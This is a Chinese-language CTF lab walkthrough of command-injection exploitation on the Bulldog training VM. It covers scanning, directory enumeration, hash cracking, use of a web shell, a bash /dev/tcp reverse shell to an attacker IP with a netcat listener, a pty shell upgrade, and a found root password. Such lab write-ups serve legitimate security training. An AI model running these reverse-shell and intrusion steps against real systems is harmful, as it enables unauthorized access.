ctf訓練 命令執行漏洞

瓊琚。發表於2020-12-04

ctf訓練 命令執行漏洞

命令執行漏洞介紹

當應用需要呼叫一些外部程式去處理內容的情況下,就會用到一些執行系統命令的函式。如PHP中的system、exec、shell_exec等,當使用者可以控制命令執行函式中的引數時,將可以注入惡意系統命令到正常命令中,造成命令執行攻擊。

呼叫這些函式執行系統命令的時候,如果將使用者的輸入作為系統命令的引數拼接到命令列中,又沒有過濾使用者的輸入的情況下,就會造成命令執行漏洞。

實驗環境

一臺kail攻擊機 和 靶機
靶機映象:https://pan.baidu.com/s/1wuAg-hARIBb_HNDZjqfrpQ
提取碼:rh8v

安裝開啟靶機(使用Oracle VM VirtualBox開啟):
(注意:靶機用橋接模式則攻擊機也用橋接模式,注意檢查!!!!)

接下來發現沒法登陸,也沒有辦法獲取ip地址
所以我們在kail下
進入控制檯

使用netdiscover命令 netdiscover -r ip/子網掩碼 命令來探測靶機
在這裡插入圖片描述
在這裡插入圖片描述
在這裡插入圖片描述
在這裡插入圖片描述
在這裡插入圖片描述

在這裡插入圖片描述在這裡插入圖片描述在這裡插入圖片描述
在這裡插入圖片描述

執行緒調到20,名字改為py

在這裡插入圖片描述發現了admin這樣一個目錄
在這裡插入圖片描述這裡nikto發現一個可疑目錄/dev
在這裡插入圖片描述
訪問/dev,發現了一個web-shell

在這裡插入圖片描述然後想著檢視原始碼,發現一些hash值,然後儲存這些值

在這裡插入圖片描述6515229daf8dbdc8b89fed2e60f107433da5f2cb 38882f3b81f8f2bc47d9f3119155b05f954892fb c6f7e34d5d08ba4a40dd5627508ccb55b425e279 0e6ae9fe8af1cd4192865ac97ebf6bda414218a9 553d917a396414ab99785694afd51df3a8a8a3e0 ddf45997a7e18a25ad5f5cf222da64814dd060d5 d8b8dd5e7f000b8dea26ef8428caf38c04466b3e

hash破解

使用線上工具進行破解,然後破解出來的值為bulldog,然後去原始碼下檢視,對應的使用者名稱為nick,然後登入

開放了80埠,使用dirb進行探測
dirb http://靶機ip,發現了兩個可疑目錄admin和dev
在這裡插入圖片描述
接下來我們通過瀏覽器訪問,http://靶機ip/admin/,是一個登入介面

在這裡插入圖片描述
在這裡插入圖片描述
然後我們就進入到了系統後臺

在這裡插入圖片描述漏洞利用

這裡有安裝教程:https://blog.csdn.net/qq_43799246/article/details/110669829

講一個工具
挖漏洞,用掃描,可以使用AVWS進行掃描
這裡輸入靶機ip

在這裡插入圖片描述
然後點選scan,選擇全掃描
在這裡插入圖片描述
然後就開始掃描了

我們進入了系統後臺,再一次檢視dev目錄,然後我們發現這裡的webshell可以點開了
在這裡插入圖片描述根據提示我們可以嘗試一下這些命令,得到結果

在這裡插入圖片描述

這裡發現id不能使用

在這裡插入圖片描述
反彈shell

攻擊機啟動監聽netcat
nc -nlvp 4444

在這裡插入圖片描述

靶場機器反彈shell

echo 'bash -i>& /dev/tcp/192.168.43.96/4444 0>&1' | bash

在這裡插入圖片描述拿到shell
在這裡插入圖片描述

滲透測試技巧
優化反彈shell終端

 python -c "import pty;pty.spawn('/bin/bash')"

在這裡插入圖片描述在這裡插入圖片描述

在這裡插入圖片描述

我們在使用customPermissionApp提權時,先看說明檔案

在這裡插入圖片描述
在這裡插入圖片描述在這裡插入圖片描述

SUPERultimatePASSWORDyouCANTget

在這裡插入圖片描述
在這裡插入圖片描述

相關文章